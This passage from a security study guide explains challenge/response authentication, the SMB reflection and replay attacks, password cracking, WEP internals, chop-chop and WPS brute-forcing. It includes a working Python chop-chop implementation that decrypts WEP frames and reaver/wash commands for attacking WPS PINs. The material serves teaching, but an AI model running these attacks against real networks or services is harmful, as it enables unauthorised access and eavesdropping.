Challenge systems take a step in the right direction, however they can be flawed, as we will see in the Here Be Dragons section. Challenge systems build upon the hash system. When a client comes to connect, the server does not ask for the password; it sends the client a freshly generated random challenge. The challenge can be any length but, for the sake of pacing, it will be only 4 characters long here: say the server sends the challenge 4444. The client takes its password hash and uses it as the key of a keyed one-way function (a hash or HMAC) computed over the challenge, and sends that response back. The server computes the same value from its stored copy of the hash and compares. Challenges are created randomly at the time of each connection.
A third party on the wire only sees the challenge and the response. Since the function is one way, a captured response cannot be replayed against a different challenge, and the attacker cannot recover the hash from it directly. Cracking is still possible offline (guess a password, hash it, compute the response for the observed challenge, compare), but precomputed rainbow tables no longer apply, because a table would have to be built for that specific challenge.
A common way around this is to force a client to connect to you and send it a fixed, known challenge (the example used here: 1234). Tools and precomputed tables have been built around responses to such a fixed challenge and, as a result, one can often recover the password.
SMBv2 uses a challenge/response system.
Uneven Algorithms
Asymmetric (public-key) algorithms, called uneven algorithms here, are the hardest to break and provide the strongest form of authentication. Two keys are created, a public and a private key. The public key is given to the other side while the private key is kept for oneself. Data encrypted with the public key can only be decrypted with the private key, and a signature made with the private key can be checked by anyone holding the public key.
The only thing an eavesdropper can gain is the public key, which can neither decrypt anything nor produce valid signatures, so on its own it is worthless to the attacker.
SSH uses asymmetric keys to authenticate the server (and optionally the user) and to agree the symmetric session key that then encrypts the data.
Here Be Dragons
This section is about mistakes made in the industry over the years, mostly Microsoft's.
Back in 2008 Microsoft released a patch for a vulnerability called the SMB credential reflection attack, made popular by the Metasploit module written to leverage it. SMB authentication is built on the password hash, so a challenge/response computed from that hash is as good as the password for the duration of a session. Someone found that you could trick a computer into authenticating to itself: a web page referenced an SMB share on the attacker's host by way of <IMG> tags, and when the victim loaded the page, Windows automatically tried to log in to that share with the current user's credentials. The attacker's server did not need the hash at all; it opened its own SMB connection back to the victim, took the challenge the victim issued, handed that same challenge to the victim's client, and reflected the victim's answer back into its own connection. The victim had just answered its own challenge, and the attacker was in. A patch was eventually released.
Later, in 2011, a person on exploit-db came forward with an attack aimed at SMBv2. It leveraged the way SMBv2 handled challenges: the challenges were not truly random, so an attacker could collect them and obtain known-good answers ahead of time.
How it works: the attacker first connects to the victim's SMB server. The server offers a challenge, which the attacker stores, and then the attacker opens a new connection and gets another challenge. It repeats this until it has around 8000 challenges. Then the victim opens a web browser and is sent to a page with a refreshing JavaScript image linked to the attacker's SMB share. Each time the victim's client connects, the attacker offers it one of the challenges collected earlier and records the victim's response, until it has a response for every collected challenge. Finally the attacker connects back to the victim's SMB server and keeps reconnecting until it is issued a challenge it already knows the answer to, replays the stored response, and gains access.
This was a huge mistake on Microsoft's part: twice their default service had gaping authentication holes that were leveraged in very similar ways.
The moral is to figure out what the real problem is. Here the problem was not only the authentication system but also the fact that an HTML page could point an image at an SMB share and trigger automatic authentication. Disabling that behaviour, which almost nobody relied on, would have removed the vector; instead the authentication logic was patched, the vector was left open, and it was exploited again.
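An added model, not from the page and not SMB's wire format, of the challenge/response scheme from the Challenge Systems section and of the three attacks on it discussed above: replaying a sniffed response, the 2008 reflection, and the 2011 collect-and-replay against a predictable challenge generator. HMAC-SHA256 stands in for the NTLM response function, a host that refuses to answer its own recently issued challenges stands in for the reflection fix, and a cycling challenge list stands in for the weak generator; all names, credentials and sizes are assumptions.

```python
import collections
import hashlib
import hmac
import itertools
import os


def password_hash(password):
    """Stand-in for the stored one-way hash (SMB uses the NT hash); any one-way function fits the model."""
    return hashlib.sha256(password.encode()).digest()


def respond(pw_hash, challenge):
    """Client side of challenge/response: a keyed one-way function of the challenge under the hash."""
    return hmac.new(pw_hash, challenge, hashlib.sha256).digest()


class Host:
    """A machine that both issues challenges (as server) and answers them (as client).

    challenge_pool: None for random 8-byte challenges, or a list the host cycles through, modelling
                    a challenge generator that is not truly random.
    own_cache:      how many of its own recently issued challenges the client side refuses to answer
                    (0 models the pre-patch client; a positive value the reflection fix, simplified).
    """

    def __init__(self, users, own_hash, challenge_pool=None, own_cache=0):
        self.users = users                  # username -> password hash this host can verify
        self.own_hash = own_hash            # credential this host presents when it connects outward
        self.gen = itertools.cycle(challenge_pool) if challenge_pool else None
        self.recent = collections.deque(maxlen=own_cache)
        self.pending = {}                   # session -> challenge awaiting a response

    def issue_challenge(self, session):
        challenge = next(self.gen) if self.gen else os.urandom(8)
        self.pending[session] = challenge
        self.recent.append(challenge)
        return challenge

    def verify(self, session, user, response):
        challenge = self.pending.pop(session, None)
        if challenge is None or user not in self.users:
            return False
        return hmac.compare_digest(respond(self.users[user], challenge), response)

    def answer(self, challenge):
        """Client side; None means the host refused a challenge it recently issued itself."""
        if challenge in self.recent:
            return None
        return respond(self.own_hash, challenge)


def sniff_and_replay(victim, user):
    """Passive eavesdropper: capture one legitimate exchange, then replay the response in a new session."""
    challenge = victim.issue_challenge("legit")
    response = respond(victim.users[user], challenge)      # the real client's answer, seen on the wire
    legit_ok = victim.verify("legit", user, response)
    victim.issue_challenge("replay")                       # new session, new challenge
    return legit_ok, victim.verify("replay", user, response)


def reflect(victim, user):
    """2008-style reflection: open a session to the victim, take the challenge it issues, hand that same
    challenge to the victim's own client (lured in by an <img> pointing at the attacker's share), and
    forward the victim's answer back into the attacker's session."""
    challenge = victim.issue_challenge("reflect")
    response = victim.answer(challenge)
    if response is None:
        victim.pending.pop("reflect")
        return False
    return victim.verify("reflect", user, response)


def harvest_and_replay(victim, user, harvest=16, attempts=32):
    """2011-style attack: collect the challenges the victim's server hands out, have the victim's client
    answer them, then reconnect until the victim reuses a challenge we already hold an answer for."""
    answers = {}
    for i in range(harvest):
        answers[victim.issue_challenge(("probe", i))] = None
        victim.pending.pop(("probe", i))                    # drop the session, keep the challenge
    for challenge in answers:
        answers[challenge] = victim.answer(challenge)       # None for those the client refuses
    for i in range(attempts):
        challenge = victim.issue_challenge(("login", i))
        response = answers.get(challenge)
        if response is not None and victim.verify(("login", i), user, response):
            return True
        victim.pending.pop(("login", i), None)
    return False
```

With random challenges and no own-challenge cache, replay fails but reflection succeeds; with a cache, reflection is refused; with a cycling generator and a cache smaller than the cycle, the harvest attack gets answers for the challenges that have already aged out of the cache and logs in as soon as one comes round again.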
Password Attacks
Passwords are one of the weaker links in the security chain, and we often have to add considerable security around password systems to protect users. Many breaches involve passwords, since people commonly reuse the same weak password for every account they own, allowing an attacker who breaches one account to breach all of them.
Theory
Password attacks usually involve a form of password guessing, either online (against the live service) or offline (against a captured hash). Some users can be easily profiled for their passwords, making this significantly easier. Others have passwords that can't be profiled but are easily guessed, or are compromised in a different fashion. Others might have strong passwords but are still exposed because the password hash is easily available, allowing an offline attack at far higher speed. As a result, password systems can often be defeated if simple mitigations aren't put in place.
Strong Vs. Weak Passwords
Weak passwords often have many associated weaknesses that can make them easily guessed.
Weak passwords often times:
• are a single word
• less than 10 characters
• use only one character set (Ex: A-Z only)
These characteristics make them easily guessed and therefore dangerous.
A strong password usually has these characteristics:
• Multiple words
• more than 10 characters
• uses more than one character set (Ex: a-z, A-Z, 0-9, symbols)
Some examples of weak and strong passwords.
Weak         | Strong
easy         | N0ts034sy!
weakpassword | 5T0n9P4$$w0rD**
Brute Force
Brute-forcing guesses the password by trying every combination from a character set, starting at the shortest length and extending one position at a time until it hits. It takes a long time when the password is long or the character set is large.
It can be done online or offline. Online it is slow and noisy: every guess is a network round trip, and lockouts or rate limits usually stop it long before success. Offline, against a captured hash, it runs at the speed of the cracking hardware and is limited only by the size of the keyspace.
Mitigations are to make each verification deliberately expensive (key stretching, so that every guess costs the attacker as much as it costs the server), to lock the account or source after a number of failed attempts, and to delay failed attempts. Linux, for example, imposes a delay of a few seconds after each failed login through PAM, so an attacker can't try again until the delay is up.
Dictionary
Dictionary attacks use a wordlist, a large list of candidate passwords. The attacker tries each entry in turn looking for a valid password. The list can be any size, but typically contains dictionary words, common passwords and leaked real-world passwords, often combined with mangling rules (capitalisation, appended digits, leet substitutions).
This attack can be done online or offline and is suitable for both, but it has a lower hit rate than brute force, since the password might not be on the list.
You can mitigate this attack with the techniques in the brute-force section, plus rejecting passwords that appear in common wordlists.
Rainbow Tables
Rainbow tables are an offline-only attack and the classic time/memory trade-off for unsalted hashes. Rather than storing every hash/plaintext pair, a table stores chains of hashes linked by a reduction function, covering a chosen keyspace such as characters a-z, A-Z, 0-9 and symbols up to some length; a lookup walks a chain to recover the plaintext. A table covering our set up to 10 characters could recover almost any password in it, but that keyspace is 77^10, roughly 7 x 10^18 candidates, so published tables in practice cover much smaller keyspaces.
Brute-force and dictionary attacks cost a lot of CPU; rainbow tables move most of that cost into a one-time precomputation but take up a lot of disk. A table with the coverage described above would run to hundreds of gigabytes. Salting defeats rainbow tables outright, because a separate table would be needed per salt.
Rainbow tables take a long time to generate and, as a result, most are sold. There is, however, a community project that generates them for free by using volunteers' machines as a distributed cluster.
GPU Cracking
This technique leverages GPUs (via CUDA or OpenCL) to compute hashes in massively parallel fashion. Against fast, unsalted hashes such as NTLM or MD5 a GPU cracker reaches billions of guesses per second, which is why the "time to crack" figures below assume an online rate and say nothing about the offline case.
Misconceptions
In all actuality, the guidelines I gave earlier for strong passwords are a little off. The passwords I listed as "strong" aren't so strong; in the scheme of things they can be OK for some applications, but length beats character-set size.
Consider this character set, which we will call the "Strong" Character Set (SCS):
a-z, A-Z, 0-9, symbols (!@#$%^&*()-+_=?)
The total number of characters in the set:
a-z = 26
A-Z = 26
0-9 = 10
symbols = 15
Total: 77
Now consider a character set aptly named the "Weak" Character Set (WCS):
a-z, 0-9
The total number of characters in the set:
a-z = 26
0-9 = 10
Total: 36
First we make a password that fits the guidelines of the earlier section and uses the SCS: M0un741n5**.
First, the cons of this password. It's difficult to remember: it uses a large character set and a lot of confusing substitutions, and I'm willing to bet that most people won't remember whether the o was a 0 or an o. Now let's look at how long it would take to crack by brute force. The point of the calculation is that a cracker doesn't need to search the full 77^11 keyspace: a password made by mangling a dictionary word carries only a couple of bits of unpredictability per character, so the estimate uses an assumed entropy per character rather than log2(77).
M0un741n5**
Chars: 11
Character set length: 77
Entropy of each character: we will assume 2 bits
Total bits of entropy: 11 x 2 = 22; call it ~28 to be generous in the password's favour
Number of guesses needed: about 2^28
Time needed to crack: about 3.1 days at 1,000 guesses a second (an online rate); an offline GPU attack on a fast hash, at billions of guesses a second, finishes in well under a second
Now let's make a password using the WCS but with a higher character count, which allows a more secure password.
Take a phrase, remove the spaces, and tack the number of words in it onto the end; for this example: thispasswordseemsunsecure4.
thispasswordseemsunsecure4
Chars: 26
Character set length: 36
Entropy of each character: we will assume 1.5 bits
Total bits of entropy: 26 x 1.5 = ~39
Number of guesses needed: about 2^39
Time needed to crack: about 17 years at 1,000 guesses a second; offline at billions of guesses a second it still falls in minutes, so the hash has to be protected as well
This password is easy to remember and hard for computers to guess online.
XKCD made this point in a comic; the punchline reads: "Through 20 years of effort, we've successfully trained everyone to use passwords that are hard for humans to remember, but easy for computers to guess."
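An added calculator, not from the page, that redoes the two estimates above with the text's character-set sizes and entropy assumptions, alongside the naive keyspace figure and an assumed offline GPU rate of 10^10 guesses a second.

```python
import math

# Character classes with the sizes the text assigns them (the symbol class is the 15 symbols it lists).
CLASSES = {
    "lower": ("abcdefghijklmnopqrstuvwxyz", 26),
    "upper": ("ABCDEFGHIJKLMNOPQRSTUVWXYZ", 26),
    "digit": ("0123456789", 10),
    "symbol": ("!@#$%^&*()-+_=?", 15),
}

ONLINE_RATE = 1e3     # guesses/second: the text's figure, typical of guessing against a live service
OFFLINE_RATE = 1e10   # guesses/second: assumed here for a GPU rig against a fast, unsalted hash


def charset_size(password):
    """Size of the union of the classes the password draws from: 77 for the SCS, 36 for the WCS."""
    return sum(size for chars, size in CLASSES.values() if any(ch in chars for ch in password))


def keyspace_bits(password):
    """Bits a brute-forcer would face if every character were uniformly random over the charset."""
    return len(password) * math.log2(charset_size(password))


def seconds_to_search(bits, rate):
    """Time to exhaust 2**bits guesses at `rate` guesses per second."""
    return 2.0 ** bits / rate


def describe(seconds):
    """Human-readable duration; anything under a second is reported as such."""
    units = (("years", 365.25 * 86400), ("days", 86400), ("hours", 3600),
             ("minutes", 60), ("seconds", 1))
    for unit, size in units:
        if seconds >= size:
            return "%.1f %s" % (seconds / size, unit)
    return "under a second"


def report(password, assumed_bits):
    """Naive keyspace beside the text's entropy estimate, with the latter turned into crack times."""
    return {
        "length": len(password),
        "charset": charset_size(password),
        "keyspace_bits": round(keyspace_bits(password), 1),
        "assumed_bits": assumed_bits,
        "online": describe(seconds_to_search(assumed_bits, ONLINE_RATE)),
        "offline": describe(seconds_to_search(assumed_bits, OFFLINE_RATE)),
    }


if __name__ == "__main__":
    # The two passwords from the text, with the total entropy the text assumes for each.
    for pw, bits in (("M0un741n5**", 28), ("thispasswordseemsunsecure4", 39)):
        print(pw, report(pw, bits))
```

Two things fall out of it: the naive keyspace (about 69 bits versus 134) overstates both passwords, since neither is random, and at offline rates even the 39-bit passphrase lasts under a minute, so the estimate only means something while the attacker is stuck guessing online against a service that rate-limits.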
hydra
xhydra
medusa
ncrack
Wireless Attacks
Theory
Wireless attacks have become extremely popular in the last couple of years due to the ubiquity of Wi-Fi and its lax security standards. The biggest issue is that, unlike wired networks, anyone in radio range can listen in on all communication between a client and an access point.
WEP
Wired Equivalent Privacy or WEP was the first wireless privacy standard to be released. Early on, many white-hat researchers wrote papers detailing WEP's huge flaws, but their concerns were ultimately ignored for years. WEP remained widely deployed long after it was known to be broken, despite being hard to use, having cryptic keys, and being easily cracked.
WEP can have multiple keys (up to four key slots), however this does not make the access point any more secure.
WEP encrypts each frame's payload with the RC4 stream cipher, keyed from the shared WEP key.
The frame body contains an initialization vector or IV, the encrypted data, and an integrity check value or ICV, which is an encrypted CRC-32 checksum. The IV is 3 bytes and the ICV is 4 bytes in length.
The IV is chosen by the sender for each frame (it is supposed to be unique per frame; many implementations simply counted up or picked at random) and is transmitted in the clear. It is prepended to the WEP key, and that concatenation is used as the RC4 key for the frame, so that different frames produce different keystreams under the same WEP key.
The RC4 algorithm is made up of two processes, the Key Scheduling Algorithm (KSA) and the Pseudo-Random Generation Algorithm (PRGA).
Next an ICV (CRC-32) is computed over the data and appended to it, so the receiver can check integrity. This data||ICV block is then XORed with the RC4 keystream generated from the IV||WEP key combination. Finally the IV is prepended, in the clear, to the encrypted block.
The finalized packet looks like this.
Not encrypted | Encrypted
IV (3 bytes)  | Data | ICV (4 bytes)
WEP Cracking
Caffe Latte
Caffe Latte is an attack that takes its name from coffee shops but can be performed anywhere there is a client looking for a WEP network that is no longer in range. Such a client broadcasts probes for the network it wants. The attacker answers as that network; the client, which holds the WEP key, then starts sending encrypted frames (gratuitous ARP and DHCP traffic) to the fake access point. By capturing those frames, flipping bits in them and replaying them to provoke more encrypted responses, the attacker collects enough traffic to recover the WEP key from the client alone, with the real access point nowhere nearby.
ARP Replay
Korek's Chop Chop Attack
Korek's Chop Chop attack allows the decryption of a single WEP frame without knowing the key, by using the access point as an integrity-check oracle.
The attack works by first obtaining an encrypted frame, which consists of the IV, the encrypted data, and the encrypted ICV. The attacker chops off the last byte of the encrypted body and guesses the plaintext value of that byte. Because the ICV is a CRC-32, which is linear, the guessed byte alone determines a 4-byte correction that, XORed into the end of the shortened frame, makes its ICV valid again if the guess was right; Korek's contribution was working out that correction without knowing the key or the plaintext.
The corrected, shortened frame is sent to the AP with the original IV. If the guess was right the AP accepts and relays the frame; if not, it silently drops it. The attacker increments the guess and resubmits until a frame is accepted, then moves on to the next byte from the end, repeating until the frame is decrypted.
Each byte takes on average 128 tries and at most 256. The result is the frame's plaintext and, by XOR, the keystream for that IV. The attack does not yield the key directly; the recovered keystream is used to forge and inject frames (such as ARP requests) that make the network generate the large number of IVs a statistical key-recovery attack needs.
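An added, self-contained implementation, not from the page and not aircrack's code, of the WEP frame construction from the WEP section and of the chop-chop loop just described: RC4 KSA/PRGA, data||ICV encapsulation, and an attacker that decrypts a frame using only an accept/reject oracle standing in for the AP. The CRC correction is derived from CRC-32's linearity; the key, IV and frame are constructed values that the attacker-side code never reads.

```python
# CRC-32 as used for the WEP ICV (standard reflected table; matches zlib.crc32).
POLY = 0xEDB88320

def _entry(i):
    for _ in range(8):
        i = (i >> 1) ^ POLY if i & 1 else i >> 1
    return i

TABLE = [_entry(i) for i in range(256)]
# Every table entry has a distinct top byte; that is what lets a CRC step be run backwards.
BY_TOP_BYTE = {entry >> 24: i for i, entry in enumerate(TABLE)}
assert len(BY_TOP_BYTE) == 256

def crc_step(reg, byte):
    return TABLE[(reg ^ byte) & 0xFF] ^ (reg >> 8)

def crc_register(data, reg=0xFFFFFFFF):
    """CRC register after feeding data; icv() applies the final inversion."""
    for b in data:
        reg = crc_step(reg, b)
    return reg

def icv(data):
    return crc_register(data) ^ 0xFFFFFFFF

VALID_REGISTER = crc_register(b"\x00\x00\x00\x00")  # register after any valid data||ICV

def crc_unstep(reg_after, byte):
    """Undo one crc_step when the byte that was fed is known."""
    i = BY_TOP_BYTE[reg_after >> 24]
    return (((reg_after ^ TABLE[i]) << 8) | ((i ^ byte) & 0xFF)) & 0xFFFFFFFF

def forge4(reg, target):
    """The 4 bytes taking the register from reg to target (CRC-32 is linear, so they always exist)."""
    indexes, r = [], target
    for _ in range(4):                      # backwards: recover the table index used at each step
        i = BY_TOP_BYTE[r >> 24]
        indexes.append(i)
        r = ((r ^ TABLE[i]) << 8) & 0xFFFFFFFF
    out, r = bytearray(), reg
    for i in reversed(indexes):             # forwards: choose the byte that hits each index
        b = (r ^ i) & 0xFF
        out.append(b)
        r = crc_step(r, b)
    return bytes(out)

# RC4 and WEP framing.
def rc4_keystream(key, n):
    s, j = list(range(256)), 0
    for i in range(256):                    # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):                      # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(iv, key, data):
    """Body = data || ICV, XORed with RC4(iv || key); the 3-byte IV is sent in clear ahead of it."""
    body = data + icv(data).to_bytes(4, "little")
    return bytes(a ^ b for a, b in zip(body, rc4_keystream(iv + key, len(body))))

def wep_decrypt(iv, key, cipher_body):
    """What the AP does: strip the keystream, check the ICV, return the data or None."""
    body = bytes(a ^ b for a, b in zip(cipher_body, rc4_keystream(iv + key, len(cipher_body))))
    data, tag = body[:-4], int.from_bytes(body[-4:], "little")
    return data if icv(data) == tag else None

# Chop-chop, driven only by the AP's accept/reject decision.
def chopchop(iv, cipher_body, ap_accepts):
    """Recover plaintext and keystream from the end of a frame, one byte per round: chop the last byte,
    guess its plaintext, derive from the guess alone the 4-byte correction that makes the shortened
    frame's ICV valid, and keep the guess the AP accepts. Stops with 4 bytes left (not recovered)."""
    cur, reg = bytes(cipher_body), VALID_REGISTER
    plain, keystream = bytearray(), bytearray()
    while len(cur) > 4:
        chopped = cur[:-1]
        for guess in range(256):
            reg_before = crc_unstep(reg, guess)
            fix = forge4(0, reg_before ^ VALID_REGISTER)
            candidate = chopped[:-4] + bytes(a ^ b for a, b in zip(chopped[-4:], fix))
            if ap_accepts(iv, candidate):
                plain.insert(0, guess)
                keystream.insert(0, cur[-1] ^ guess)
                cur, reg = chopped, reg_before
                break
        else:
            raise RuntimeError("no guess accepted: not a valid WEP body")
    return bytes(plain), bytes(keystream)

# Demo with constructed values; nothing on the attacker side reads WEP_KEY.
WEP_KEY = bytes.fromhex("0102030405")                    # constructed 40-bit key
IV = b"\x3a\x21\x0c"                                     # constructed IV
FRAME = b"\xaa\xaa\x03\x00\x00\x00\x08\x06ARP-PAYLOAD"   # constructed LLC/SNAP header + payload

def run_demo():
    """Returns (plaintext recovered correctly, keystream recovered correctly, recovered plaintext)."""
    cipher = wep_encrypt(IV, WEP_KEY, FRAME)
    ap_accepts = lambda iv, body: wep_decrypt(iv, WEP_KEY, body) is not None   # the AP's ICV check
    plain, ks = chopchop(IV, cipher, ap_accepts)
    want_plain = (FRAME + icv(FRAME).to_bytes(4, "little"))[4:]
    want_ks = rc4_keystream(IV + WEP_KEY, len(cipher))[4:]
    return plain == want_plain, ks == want_ks, plain

if __name__ == "__main__":
    print(run_demo())
```

Each round tries at most 256 corrected frames against the oracle, as the text says, and only the correct guess can produce a valid ICV, so there are no false positives. The recovered keystream for this IV is what later frame forging (ARP injection) builds on; the first 4 bytes of data||ICV stay unrecovered, which matters little in practice because the LLC/SNAP header that occupies them is predictable.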
Hirte Attack
Fragmentation Attack
WPA
WPA Cracking
WPA2
WPA2 Cracking
WPS
WPS (Wi-Fi Protected Setup) is a feature common to most consumer routers that comes in two varieties, PIN and push-button. It exists to let a client join a WPA/WPA2 network without typing the passphrase: the access point hands the WPA/WPA2 credentials to any client that completes the WPS exchange. In the PIN version, the client proves itself with an 8-digit PIN, typically printed on the router and given out by whoever administers the network. The push-button version opens a short window after the button on the router is pressed, during which any client that asks is let in.
WPS Cracking
WPS cracking involves two tools, wash and reaver, to find vulnerable networks and brute-force the PIN. The AP checks the PIN in two halves and the last digit is a checksum, so only about 11,000 attempts are needed rather than 10^8.
Wash
Wash is a tool to find WPS-enabled access points. First, ensure your card is in monitor mode (see: airmon-ng), then use the following command to begin scanning.
• wash -i [interface]
Wash lists the access points with WPS enabled. Access points with WPS Locked set to No are open to PIN brute-forcing, while Yes in that column means the AP has locked WPS (typically after too many failed attempts) and will refuse further PIN attempts until it unlocks.
Reaver
Reaver brute-forces an access point's WPS PIN.
• reaver -i [interface] -b [bssid] -vv
Reaver saves its session if you stop an attack and resumes from the same point when the command is run again. Expect many access points to rate-limit or lock WPS part-way through; reaver waits and retries, so an attack can take hours.
DoS Attacks
Deauthentication Attacks
This attack involves sending large numbers of deauthentication frames to a client (or, via the broadcast address, all clients) connected to an access point. The frames carry the access point's MAC address as their source, and because management frames are unauthenticated unless 802.11w is in use, the victim accepts them and disconnects. Deauthentication is also a building block for other attacks: it forces clients to reconnect, which produces the WPA handshake needed for WPA cracking.
Man In The Middle
The wireless man-in-the-middle attack abuses the trust a computer places in access points it already knows. A client automatically connects to a network whose name it remembers, preferring the strongest signal, so an attacker who broadcasts a known SSID (an "evil twin") with a stronger signal than the legitimate access point gets the client to associate with them and can then intercept or modify its traffic.